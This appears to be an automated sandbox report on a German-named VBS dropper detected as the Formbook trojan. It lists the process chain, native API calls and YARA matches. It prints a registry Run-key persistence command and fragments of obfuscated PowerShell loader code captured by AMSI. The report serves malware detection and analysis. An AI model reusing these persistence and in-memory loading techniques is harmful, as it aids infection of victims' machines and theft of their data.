          Source: wscript.exe, 00000000.00000003.1737953396.00000271C00C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1737292846.00000271C005F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1738541930.00000271C00C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1739297831.00000271C22D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
          Source: wscript.exe, 00000000.00000003.1691091574.00000271C22FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?39d9c19692ac2
          Source: wscript.exe, 00000000.00000003.1737953396.00000271C00C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1737292846.00000271C005F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1738541930.00000271C00C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/engKa
          Source: wscript.exe, 00000000.00000003.1691862227.00000271C2325000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1691091574.00000271C22FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?39d9c19692
          Source: powershell.exe, 00000007.00000002.2815067045.000001A99C1F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2197404574.000000000580B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 0000000A.00000002.2141351591.00000000048F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000007.00000002.2596105612.000001A98C181000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 0000000A.00000002.2141351591.00000000048F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000007.00000002.2596105612.000001A98C181000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
          Source: powershell.exe, 0000000A.00000002.2197404574.000000000580B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
          Source: powershell.exe, 0000000A.00000002.2197404574.000000000580B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 0000000A.00000002.2197404574.000000000580B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 0000000A.00000002.2141351591.00000000048F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000007.00000002.2596105612.000001A98D62D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
          Source: powershell.exe, 00000007.00000002.2815067045.000001A99C1F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2197404574.000000000580B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe

          E-Banking Fraud

          Source: Yara match File source: 00000014.00000002.2971248438.0000000000EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000F.00000002.2454959206.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000013.00000002.2971966360.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000016.00000002.2697965276.00000000010E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000F.00000002.2503696155.0000000025250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000014.00000002.2971188176.0000000000E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: amsi64_7316.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: amsi32_7560.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: 00000014.00000002.2971248438.0000000000EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000F.00000002.2454959206.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000013.00000002.2971966360.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000016.00000002.2697965276.00000000010E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000F.00000002.2503696155.0000000025250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000014.00000002.2971188176.0000000000E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: powershell.exe PID: 7316, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: Process Memory Space: powershell.exe PID: 7560, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 6871
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6871
          Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir
          Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B735C0 NtCreateMutant,LdrInitializeThunk,15_2_23B735C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72B60 NtClose,LdrInitializeThunk,15_2_23B72B60
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72DF0 NtQuerySystemInformation,LdrInitializeThunk,15_2_23B72DF0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72C70 NtFreeVirtualMemory,LdrInitializeThunk,15_2_23B72C70
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B74340 NtSetContextThread,15_2_23B74340
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B73090 NtSetValueKey,15_2_23B73090
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B73010 NtOpenDirectoryObject,15_2_23B73010
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B74650 NtSuspendThread,15_2_23B74650
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72BA0 NtEnumerateValueKey,15_2_23B72BA0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72B80 NtQueryInformationFile,15_2_23B72B80
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72BF0 NtAllocateVirtualMemory,15_2_23B72BF0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72BE0 NtQueryValueKey,15_2_23B72BE0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72AB0 NtWaitForSingleObject,15_2_23B72AB0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72AF0 NtWriteFile,15_2_23B72AF0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72AD0 NtReadFile,15_2_23B72AD0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B739B0 NtGetContextThread,15_2_23B739B0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72FB0 NtResumeThread,15_2_23B72FB0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72FA0 NtQuerySection,15_2_23B72FA0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72F90 NtProtectVirtualMemory,15_2_23B72F90
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72FE0 NtCreateFile,15_2_23B72FE0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72F30 NtCreateSection,15_2_23B72F30
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72F60 NtCreateProcessEx,15_2_23B72F60
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72EA0 NtAdjustPrivilegesToken,15_2_23B72EA0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72E80 NtReadVirtualMemory,15_2_23B72E80
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72EE0 NtQueueApcThread,15_2_23B72EE0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72E30 NtWriteVirtualMemory,15_2_23B72E30
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72DB0 NtEnumerateKey,15_2_23B72DB0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72DD0 NtDelayExecution,15_2_23B72DD0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72D30 NtUnmapViewOfSection,15_2_23B72D30
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B73D10 NtOpenProcessToken,15_2_23B73D10
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72D10 NtMapViewOfSection,15_2_23B72D10
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72D00 NtSetInformationFile,15_2_23B72D00
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B73D70 NtOpenThread,15_2_23B73D70
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72CA0 NtQueryInformationToken,15_2_23B72CA0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72CF0 NtOpenProcess,15_2_23B72CF0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72CC0 NtQueryVirtualMemory,15_2_23B72CC0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72C00 NtQueryInformationProcess,15_2_23B72C00
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72C60 NtCreateKey,15_2_23B72C60
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_04FC8560 Sleep,LdrInitializeThunk,NtProtectVirtualMemory,15_2_04FC8560
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C635C0 NtCreateMutant,LdrInitializeThunk,20_2_04C635C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C64650 NtSuspendThread,LdrInitializeThunk,20_2_04C64650
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C64340 NtSetContextThread,LdrInitializeThunk,20_2_04C64340
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C62CA0 NtQueryInformationToken,LdrInitializeThunk,20_2_04C62CA0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C62C60 NtCreateKey,LdrInitializeThunk,20_2_04C62C60
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C62C70 NtFreeVirtualMemory,LdrInitializeThunk,20_2_04C62C70
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C62DD0 NtDelayExecution,LdrInitializeThunk,20_2_04C62DD0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C62DF0 NtQuerySystemInformation,LdrInitializeThunk,20_2_04C62DF0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C62D10 NtMapViewOfSection,LdrInitializeThunk,20_2_04C62D10
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C62D30 NtUnmapViewOfSection,LdrInitializeThunk,20_2_04C62D30
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C62EE0 NtQueueApcThread,LdrInitializeThunk,20_2_04C62EE0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C62E80 NtReadVirtualMemory,LdrInitializeThunk,20_2_04C62E80
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C62FB0 NtResumeThread,LdrInitializeThunk,20_2_04C62FB0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 20_2_04C62F30 NtCreateSection,LdrInitializeThunk,20_2_04C62F30
          Source: Zahlungsbeleg 202405029058.vbs, Initial sample: Strings found which are bigger than 50
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 480
          Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)"
          Source: amsi64_7316.amsi.csv, type: OTHER, Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: amsi32_7560.amsi.csv, type: OTHER, Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: 00000014.00000002.2971248438.0000000000EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000F.00000002.2454959206.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000013.00000002.2971966360.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000016.00000002.2697965276.00000000010E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000F.00000002.2503696155.0000000025250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000014.00000002.2971188176.0000000000E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: powershell.exe PID: 7316, type: MEMORYSTR, Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: Process Memory Space: powershell.exe PID: 7560, type: MEMORYSTR, Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: classification engine, Classification label: mal100.troj.expl.evad.winVBS@29/13@1/2
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Roaming\Vaterpassenes24.Acc
          Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6976:120:WilError_03
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Mutant created: NULL
          Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7248:120:WilError_03
          Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7324:120:WilError_03
          Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8000:120:WilError_03
          Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7192:120:WilError_03
          Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3496
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_13umbca1.mvr.ps1
          Source: unknown, Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zahlungsbeleg 202405029058.vbs"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7316
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7560
          Source: C:\Windows\System32\wscript.exe, File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Windows\System32\wscript.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown, Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zahlungsbeleg 202405029058.vbs"
          Source: C:\Windows\System32\wscript.exe, Process created: C:\Windows\System32\PING.EXE ping google.com -n 1
          Source: C:\Windows\System32\PING.EXE, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\wscript.exe, Process created: C:\Windows\System32\PING.EXE ping %.%.%.%
          Source: C:\Windows\System32\PING.EXE, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\wscript.exe, Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir
          Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\wscript.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell command line omitted]
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Vaterpassenes24.Acc && echo $"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell command line omitted]
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Vaterpassenes24.Acc && echo $"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)"
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 480
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping google.com -n 1
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping %.%.%.%
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.2228792589.00000000082A5000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 0000000A.00000002.2226049542.00000000073D6000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdb source: powershell.exe, 0000000A.00000002.2226049542.00000000073D6000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: wab.exe, clip.exe
          Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.2226049542.0000000007469000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdbk source: powershell.exe, 0000000A.00000002.2226049542.00000000073D6000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000A.00000002.2226049542.00000000073D6000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("POWERSHELL "$Reglorified = 1;$Toupe='S';$Toupe+='ubstrin';$Toupe+='g';Function Tyknende($Frontotemporal){$Kommand", "0")
          Source: Yara match File source: 0000000F.00000002.2467703895.0000000004F10000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000A.00000002.2231302976.000000000AFC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000A.00000002.2230990264.0000000008710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000A.00000002.2197404574.0000000005936000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000007.00000002.2815067045.000001A99C1F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Fosser)$global:Delegeretmder = [System.Text.Encoding]::ASCII.GetString($Positionsangivelse)$global:Binres=$Delegeretmder.substring(284021,28471)<#Gazy Kjolekldte Auletai #>$Entreater
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Messed $Marikka $Bhmere), (Elskende @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Silkeforenes216 = [AppDomain]::CurrentDomain.GetAssemblies()$global:Sta
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Sammentmret)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Krekortets, $false).DefineType($Tanjib, $Gitt
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Fosser)$global:Delegeretmder = [System.Text.Encoding]::ASCII.GetString($Positionsangivelse)$global:Binres=$Delegeretmder.substring(284021,28471)<#Gazy Kjolekldte Auletai #>$Entreater
